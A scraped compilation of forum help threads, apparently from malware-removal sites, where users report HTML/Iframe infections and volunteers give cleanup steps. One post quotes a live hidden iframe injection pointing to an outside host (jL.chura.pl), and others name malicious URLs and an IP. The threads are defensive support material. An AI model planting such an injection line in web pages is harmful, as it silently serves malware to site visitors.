In the last week, my computer has started having issues and restarting randomly.  When I try to maximize some videos on youtube, occasionally the video will only cover 1/3 of the screen and immediately freeze.  Avast said everything was good, but I tried a boot scan anyway; it would pop up and identify some infected files, but when I told it to fix them, it would say those files are no longer there.  I can't find the text file that avast apparently made, but I do remember clickjacker and a frame flashing across the screen.  I'd appreciate any help you could give in clearing this up.  
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.16518  BrowserJavaVersion: 10.51.2
Run by Josh at 0:33:52 on 2014-02-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.16382.14153 [GMT -6:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\W... Read more

A:Iframe, clickjacker?

Hi Fajen
My name is polskamachina and I will be assisting you with your malware problems. What follows below are some ground rules for this forum.
I will reply as soon as possible (typically within 24-48 hours). In turn, I ask that you please respond within 72 hours. If you know you will be away longer than that, please let me know.
I am in California at GMT-8 Hours (Pacific Standard Time). If I do not respond to you within 48 hours, feel free to send me a private message.
Some points for you to keep in mind:
Do NOT run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Do not attach logs or use code boxes, just copy and paste the text.
I cannot see your computer. Periodically update me on the condition of your computer, and provide as much detail as you can in every post.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end.
NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned. You can put them on a CD/DVD, external drive or a flash drive, anywhere except on the computer.
NOTE: It is good practice to copy and paste the instructions into notepad and print them in ca... Read more

Read other 22 answers
RELEVANCY SCORE 38

I am using windows XP SP3 with ESET NOD v 4.0.437.0 and firefox 3.5.19

When I access some websites lately ESET NOD reports some viral activity and blocks access to a third party web address. The problem is repeatable on a these websites then seems to go away after a day or two and a similar problem may occur when accessing a different website.

One example of the threat warning is:

Object:
http://jclao.com/archives/1283

Threat:
HTML:Iframe.B.Gen virus
Connection terminated - quarantined

A second message then appeared:

Address has been blocked:
"www.jdbbank.com/gadgets/gadgets.php"
IP address:
61.19.241.97:80

The website owners claimed they have checked their site with several checkers and found no virus. although jdbbank did have a legitimate link on their site.

I later got a simialr message from a completely unrelated site (cme.com) so I became suspicious that my computer may have some malware. That access reported activity by the Kryptic.E trojan, but I did not manage to copy the full details.

I ran a full scan with ESET NOD32, but found nothing.

I ran the steps in your prep guide. The DDS log is pasted below.

The attach.txt and GMER log files are attached.

Note the GMER log took nearly 12 hours to complete.

.
DDS (Ver_11-03-05.01) - NTFSx86
Run by Nick at 18:19:06.98 on Thu 05/05/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_23
Microsoft Windows XP Professional 5.1.2600.3.1252.61.1033.18.1526.524 [GMT 7:00]
.
AV: ESET NOD32 Antiv... Read more

A:Iframe.B.Gen and or Kryptik.E virus

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

Read other 18 answers
RELEVANCY SCORE 38

I am running Windows XP Home Edition SP3 and while clicking on a link trying to find the lyrics to a certain song last night, Avast alerted me to a Virus/Worm. It went through the whole routine of freezing everything up and not being able to close the windows, but eventually I instructed Avast to delete it. I then did a full Avast scan in safe mode and everything was clean except for this one line:Name Of FileC:\Documents and Settings\Sean\Local Settings\Temporary Internet Files\Content.IE5\SEIGLIUM\search[1].htmResultInfection: HTML:Iframe-inf (it could be lframe-inf but I couldn't tell from the readout)Is this anything to worry about? Is it safe to assume that since it was in the Temporary Internet Files folder for IE5 and not in a System folder then it's not that much of a threat? Since I'm running IE7, do I even need any IE5 files? Couldn't I just delete the entire IE5 content folder?Today, I did another half a dozen full scans in safe mode with Malewarebytes' Anti-Malware, SUPERAntiSpyware, Spybot S&D, SpywareBlaster, a-squared, RogueRemover, etc. and they all came up clean. Please advise me of anything else I can do that might help.I am going to run another full Avast scan tonight in safe mode just to be sure that it's completely gone. Also, I notice that when I run Avast in safe mode it says, "Resident Protection: Disabled" - is this normal? It's usually set to either Normal or Custom dependin... Read more

A:Infection: HTML:Iframe-inf

Please print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights"Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.Please copy and paste the contents of Report.txt in your next reply.Be sure to renable you anti-virus and and other security programs before connecting to the Internet.-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.

Read other 3 answers
RELEVANCY SCORE 38

Problem: I upload to websites from work, home, and satellite office. I installed Filezilla FTP program to upload to all three locations about 3 months ago. Mid-June, my websites started indicating they were virus-infected when opening them up through a browser. At work I have McAffee Anti-Virus and at home I use AVAST. The AVAST is telling me I have a Trojan HTML:IFrame-HY [Trj]. From what I have read with the Filezilla problem, the iframe injects into the index pages of a website. On my index.html page, it creates a frame or space that causes my page to appear jumbled. On the index.php pages of my company site, it causes a PHP error message (I have a php calendar and a php quiz).

I tried uploading over these (through my file manager online) and the errors came back. I went online through my webhost and opened the files up through the file manager, deleted the code and pasted in what I thought was good code for the php pages. I did see injected code on this page before I deleted it and made a copy of it. This seems to have worked for the php index pages but my index.html page is still throwing virus warnings ? I can?t see any injected code in that page.

For what I understand about the Filezilla, it doesn?t protect the FTP passwords. I have another small website I work from home on and I deleted all of the files through the file manager online and uploaded what I believed to be cleaned files after changing my FTP passwords. When I previewed it in the bro... Read more

A:trojan HTML:IFrame-HY

bumping

Read other 1 answers
RELEVANCY SCORE 38

Hello,Two days ago AVG?s resident shield announced a chura virus when opening Firefox. I searched and found the line <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> in a HTML file just before the body closing tag. I made a search with Vista search (very slow) and found 59 HTML files with the same code on the same place. I scanned the computer with AVG and then with Anti-Malware, Ad-Aware and SUPERAntiSpyware. No way, they found just a few small problems that were taken care of. I removed that line of code from all files, but when I made another search there were over 150 infected files. I repeated the cycle (search, clean the files by hand, AVG and the others). This time AV and AS found nothing! I made a third search and now there were nearly 2000 infected HTML files. I can?t clean so many files by hand, and from the previous experiences it was worthless because all the files I had cleaned were infected again.I have a site and its files on my computer are now infected. I cannot access the site because I am sure to spread the virus all over and also distribute the virus to whoever visits. Not better is the fact that I save many files in HTML because I find it practical, so I have many HTML files. Even worse is that the infection is not on the start up HD with the OS where I could just reformat and reinstall or replace with a saved image, but on another HD where I have all my files and the site files. The C: disk has only ... Read more

A:<iframe> chura virus

Hello Straydog,In checking web references on the type of infection you posted here I see, as you probably have, a trail of discussions going back to perhaps March, and few with any direct confirmation of the infection sources, or complete solutions. However, in some of that web info I see references to "Virto" which is a form of the Virut file infector malware (see here). Virto/Virut injects it's code into all of certain file types on systems, and is so pervasive and elusive in activities that the only best option for a solution is to reformat and reinstall, and all without saving any personal data from the system. If I were a site owner (and I am) and knew my system was infected with such a virulent malware (which has happened to one of my systems), I would reformat and reinstall, and regroup after as far as how to return needed settings and softwares etc. We can do some scan/checks here to see what all still needs cleaning, but up front, should there be any verification of Virto involvement I will end all assistance, with the correct suggestion of that reformat/reinstall solution.For the website, send me via PM the site name, so I can evaluate it's current status. Plan to only access that site from some other computer that is known to be malware free, and also has not been used before to access the site's web program (such as cPanel). From a different computer right now, change all control panel/site passwords. You can assume the site's security has been compromis... Read more

Read other 7 answers
RELEVANCY SCORE 38

Ok I've got an iFrame on website and I want a link to open a new browser window from the page in the iFrame when it's clicked on so it doesn't take you away from the site.

_blank loads the entire page in the iFrame
_parent opens the entire page in the browser window that I don't want the person to be taken away from...

HELP!! It does this in both IE and Mozilla Firefox...

This one has me totally stumped!
 

A:Solved: iFrame problems

I belive "_new" should work.
 

Read other 2 answers
RELEVANCY SCORE 38

anyone know what line of code will give me the width and height of an inline frame? please help thanks I want to make something size with the screen but can't.
 

A:detecting IFRAME size

Read other 8 answers
RELEVANCY SCORE 38

I hit a website and the browser crashed. I noticed that things started acting wacky after that happened so I jumped on a mac to look at the source of the page. I found someone had injected javascript that opened an iframe and redirected to an 81.x.x.x site in panama. Here's the log. The scary line for me is :O4 - HKLM\..\Run: [xxy_Shell] C:\Documents and Settings\JDOE\xxy_rawv.exe

I've cleaned the files with McAfee but not sure where to go from here other than wiping the drive. I also know exactly when it hit so could I use the XP resetore? Any ideas are greatly appreciated.

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 3:46:07 PM, on 4/20/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ngvpnmgr.exe
C:\Program Files\Cisco Systems\SSL VPN Client\agent.exe
C:\Program Files\Juniper\NetScreen-Remote\IreIKE.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Juniper\NetScreen-Remote\IPSecMon.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
c:\PR... Read more

A:HJT log after iframe/redirect to Panama

Hi and welcome to TSF.

Apologies for any delay in replying, but we have been rather busy lately, and, of course, all our helpers are volunteers.

Since it has been a few days since you first posted, please follow these instructions if you still need assistance.

Download Deckard's System Scanner (DSS) to your Desktop . Note: You must be logged onto an account with administrator privileges.Close all applications and windows.
Double-click on dss.exe to run it, and follow the prompts.
When the scan is complete, two text files will open - minimised > extra.txt and maximised > main.txt.
Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of main.txt back in this thread (do not attach it).
Please attach extra.txt to your post.


To attach a file to a new post, simplyClick the[Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
copy and paste the following into the "Upload File from your Computer" box:C:\Deckard\System Scanner\extra.txt

Click Upload.

I will monitor this thread for your reply.

Thank you for your patience.

Read other 1 answers
RELEVANCY SCORE 38

i need help with this virus Thanks

html/iframe.B.Gen virus

this virus is on my laptop

im running vista 64 bit

A:i need help with this html/iframe.B.Gen virus

Welcome aboard Download Security Check from HERE, and save it to your Desktop. * Double-click SecurityCheck.exe * Follow the onscreen instructions inside of the black box. * A Notepad document should open automatically called checkup.txt; please post the contents of that document.=============================================================================Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdatePress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply.====================================================================================Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeClick Go and post the result.=============================================================================Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/products/malwarebytes_free to your desktop. * Double-click mbam-setup.exe and follow the prompts to install the program. * At the end, be sure a checkmark is placed next to Update Malware... Read more

Read other 10 answers
RELEVANCY SCORE 38

I have my website by name:padasalgi.tripod.com since 11 years.Today when I tried to goto my site I am getting the following alert message and connection to any files in this url are disconnected. I am very much afraid since the contents of my webpages could not be surfed by any one due to this malware.I am quite new to the malware/worms etc I humbly request will any one please advise and guide me how this malware virus could be removed. The details of the malware alert are as under:avast!WarningA Virus Was Found!There is no reason to worry,though avast! has stopped the malware before it could enter your computer.When you click on the "Abort connection" button, the download of the dangerous file will be cancelled.File name: http://padasalgi.tripod.com/\{gzip}Malware name :HTML.Iframe-infMalware type : Virus/WormVPS version : 091227-0,12/*27/2009I once again request everybody please help me in removing this virus.

Read other answers
RELEVANCY SCORE 38

I recently went to a website and my NOD32 came up with a Iframe.b.gen warning.
I immediately did a full scan on my computer and found nothing, but it would put my mind at rest if someone could have a look at my log files.

I ran gmer but the text files came up blank

.
DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Darren at 21:13:27.69 on 24/03/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_24
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.44.1033.18.6135.4461 [GMT 0:00]
.
AV: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\ESET\ESET NOD32 Antivirus... Read more

A:Iframe.B.gen virus warning

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

I'm not seeing anything in your logs. We'll do an online scanner to check for remnants shortly.

------------------------------------------------------

Advanced SystemCare

We do not recommend the use of registry cleaners. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling them via Programs and Features in your Control Panel.

------------------------------------------------------

Please uninstall the following via Start->(or Computer)->Control Panel->Programs->Programs and Features if it still exists:

Coupon Printer for Windows<<Please read here

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\Coupons

------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In 64-bit Windows Vista/Win7, you must open the 64-bit IE browser.

Navigate to C:\Program Files (x86)\Internet E... Read more

Read other 2 answers
RELEVANCY SCORE 38

Problem: A couple months ago I some how got some malware on my mac at work (I don't know how because I don't go to "the sites you should stay away from", so I am guessing it was probably from some stupid ad banner. ANYWAY, when I logged into our website via FTP, a week later I noticed our website was blocked by Google (a client actually called us to tell us) and so I looked around to find the malicious script hidden iframe. The problem is it doesn't affect my mac. I'm getting tired of removing the script from our website every other week not to mention I have no idea what the affects are on a mac and don't want to compromise other peoples computers.

FTP Software: FireFTP
Mac OS: 10.4
Software tried: MacScan (did not detect any malware)

I am trying to take care of this without involving any money and unfortanately there isn't much "free" Software out there for Macs or scanners.

Anyone know how to remove this? I am having the FTP passwords changed but I do not want to log back into the FTP only to have it happen all over again and then have to change our FTP passwords again.

Please help!
Thank you.

A:Mac and the iframe malicious script

You might have to wait awhile for a reply
I'm going to bring this to the attention of some people who should know
Hang in there

Read other 2 answers
RELEVANCY SCORE 38

I am using an iframe for calling other websites. I want to disable right click in this Iframe. Can anybody help me out in this.
 

A:Help! To disable right click in Iframe

It'll only work for people using IE and I think you'd have to disable it for the whole page and not just the iframe. Plus the IE user would have to have Javascript turned on for it to even work.

Other browsers have options to block you from doing evil stuff like that.

Also, keep in mind that for security reasons, browsers are very picky with what you can do with an iframe if the site loaded in it is not on the same server/domain as the page.
 

Read other 1 answers
RELEVANCY SCORE 38

hi, i'm developing a site that uses iframes for some of its features.
the problem is with the session variables. it seems that, if the "Always allow session cookies" form the "Advanced Privacy Settings" from IE privacy options is turned off, the session lost its id. so, the session values are lost from one page to another.
i'm trying to override that setting for this site only. someone knows how?
maybe some protocol or certificate, i don't know.
the use of iframes is out of discussion.

Read other answers
RELEVANCY SCORE 38

Hi Guys,

I've been suspecting that someone or something has hacked my computer, so I did a system scan with panda activescan and this has confirmed my suspicions. Its seems these files are located in Outlook 2000.

I've been suspicious about this for a few weeks but last night when some of my clients were receiving email failed notices when trying to send me emails - one of them asked if I was using a blackberry phone and whether my emails were being redirected to this phone, to which I answered "no". Therefore it appears that what ever hacker tool is lurking in Outlook could be redirecting my emails to someone else. This is only my assumption and I would like someone to confirm if this is in fact correct.

Can someone help to remove all the hacking tools in Outlook 2000, and also the spyware that activescan has picked up.

I have attached the results of activescan and also a hijackthis log file. Both are attached in notepad.

Thanks.

Kind Regards,
Brian
 

A:Hacktool:Exploit/iFrame

Read other 14 answers
RELEVANCY SCORE 38

I have Exploit-IFrame trojan on my machine.
I only enocunter it when going to my own websites.
McAfee finds it and deletes it and shows me its location, I follow it and do not see the offending trojan, and the suffix changes each time it is found and cleaned both on the AOL and I.E. browsers.
I have run Ad-Aware SE Personal, AVG 7.5, and a complete McAfee scan - nothing found.

Step 1. None of the Malware listed, or Rogue programs exist on this machine.

Step 2. Run Panda ActiveScan.

Step 3. Downloaded and Installed Spyware Blaster from Desktop.

Step 4. I have SP 1 and 2 installed already.

Step 5. Downloaded Deckard's Systen Scanner to Desktop

Panda Activescan

Incident Status Location

Adware:adware/ncase Not disinfected c:\temp\FLEOK
Adware:adware/sidesearch ... Read more

A:Exploit-IFrame trojan

dss.exe encountered a problem and had to close

Read other 2 answers
RELEVANCY SCORE 38

I have run eset online scanner tool and it identifies problem as HTML/Iframe.B.Gen virus and JS/Exploit.Agent.NHC trojan.  The eset tool never completes its scan.  I have run Malwarebyte's and Rogue Killer.  Each removed some other malware but repeating those scans don't find anything now.  PC is very slow.  I have attempted to run CCleaner and it never completes it's analysis when scanning for temporary Internet files.  This is an office PC.  QS1 and Integra/Docutrack are legit applications.
 
Thanks for any help provided. 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 8.0.7601.17514
Run by NSSUser at 8:48:44 on 2014-08-07
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3998.1045 [GMT -4:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\mfevtps.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\ctfmon.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files (x86)\Task Killer\TaskKil... Read more

A:HTML/Iframe.B.Gen virus

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.  Please upload attach.txt as well and do the following:   Scan with Gmer rootkit scannerPlease download Gmer from here by clicking on the "Download EXE" Button.Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.If it giv... Read more

Read other 16 answers